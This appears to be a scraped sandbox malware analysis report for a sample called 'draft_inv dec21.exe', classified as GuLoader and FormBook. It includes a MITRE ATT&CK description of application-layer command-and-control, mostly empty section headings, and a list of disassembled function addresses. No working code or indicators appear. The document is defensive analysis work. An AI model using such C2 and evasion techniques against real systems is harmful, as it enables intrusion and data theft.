Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report draft_inv dec21.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Threatname: FormBook

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 0242CB27, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 273
memorynativeCOMMON

Function 0242FCFD, Relevance: 9.9, APIs: 1, Strings: 4, Instructions: 1179
COMMON

Function 0243069C, Relevance: 9.8, APIs: 1, Strings: 4, Instructions: 1025
COMMON

Function 02432CD7, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 410
COMMON

Function 02430A65, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 367
COMMON

Function 0242FFE4, Relevance: 6.3, Strings: 5, Instructions: 69
COMMON

Function 0243265F, Relevance: 1.5, APIs: 1, Instructions: 37
nativeCOMMON

Function 0041B4B0, Relevance: 503.8, APIs: 251, Strings: 36, Instructions: 1528
COMMON

Function 0041CE60, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 191
COMMON

Function 0243137E, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
COMMON

Function 0242F3A0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 190
COMMON

Function 0242F681, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
libraryCOMMON

Function 00401668, Relevance: 1.8, APIs: 1, Instructions: 289
COMMON

Function 0242C6F8, Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Function 02423B5B, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON